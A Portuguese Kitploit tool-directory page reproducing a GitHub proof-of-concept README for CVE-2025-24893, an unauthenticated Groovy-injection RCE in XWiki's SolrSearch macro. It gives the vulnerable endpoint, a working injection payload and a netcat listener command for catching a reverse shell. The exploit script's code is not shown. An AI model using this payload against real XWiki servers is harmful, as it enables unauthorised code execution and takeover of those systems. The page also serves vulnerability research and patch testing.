Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC — CVE-2025-24893 é uma vulnerabilidade crítica de execução remota de código sem autenticação no XWiki (versões < 15.10.11, 16.4.1, 16.5.0RC1) causada pelo tratamento inadequado de expressões Groovy na macro SolrSearch. | Kitploit
Ferramentas/GitHubGitHub/dollarboysushil/cve-2025-24893-xwiki-unauthenticated-rce-exploit-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubdollarboysushil/cve-2025-24893-xwiki-unauthenticated-rce-exploit-poc

CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC

CVE-2025-24893 é uma vulnerabilidade crítica de execução remota de código sem autenticação no XWiki (versões < 15.10.11, 16.4.1, 16.5.0RC1) causada pelo tratamento inadequado de expressões Groovy na macro SolrSearch.

Ver RepositórioSite
1711há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-24893 - PoC de Exploração de RCE não Autenticado no XWiki

⚠️ Execução Remota de Código não Autenticada no XWiki
🛠️ Implementação do PoC por @dollarboysushil

💡 Visão Geral

CVE-2025-24893 é uma vulnerabilidade crítica de RCE no XWiki, causada pelo tratamento inseguro de expressões Groovy dentro do macro SolrSearch. Um atacante pode injetar código Groovy por meio de uma solicitação GET manipulada, levando à execução remota de código (sem exigir autenticação).

  • Gravidade: Crítica (CVSS 9.8)
  • Afetados: Versões < 15.10.11, 16.4.1, 16.5.0RC1

🛠 Detalhamento Técnico

A vulnerabilidade reside no macro SolrSearch (Main.SolrSearch) do XWiki, que processa a entrada de pesquisa usando avaliação Groovy insegura. O macro não sanitiza a entrada fornecida pelo usuário, permitindo a execução arbitrária de código.

🔥 Endpoint Vulnerável

root@kitploit:~
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

Um atacante pode injetar código Groovy no parâmetro text, que é avaliado no lado do servidor devido ao tratamento inadequado de entrada dentro do sistema de macros.

💥 Exemplo de Payload

root@kitploit:~
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}

Isso leva à Execução Remota de Código (RCE) não autenticada em instâncias XWiki vulneráveis.

🔬 Demonstração do Proof-of-Concept (PoC)

🧪 Ambiente Alvo

O alvo vulnerável é uma instância do XWiki executando a versão 15.10.8, que é afetada pela CVE-2025-24893.

Vulnerable XWiki Interface


📡 Preparando o Listener

Inicie um listener Netcat na máquina do atacante para capturar a conexão do reverse shell:

root@kitploit:~
nc -lvnp 1337

Netcat Listener Active on Port 1337


🚀 Executando o Exploit

Execute o script de exploit CVE-2025-24893-dbs.py para entregar o payload de RCE baseado em Groovy ao endpoint XWiki vulnerável.

Running Exploit Script


💻 Acesso Remoto ao Shell com Sucesso

Após a execução bem-sucedida, o reverse shell se conectará de volta ao listener, concedendo ao atacante acesso remoto ao servidor.

Reverse Shell Acquired


📚 Referências

  • Blog da OffSec: CVE-2025-24893 XWiki Groovy RCE
  • Entrada na NVD: CVE-2025-24893
Baixar ferramenta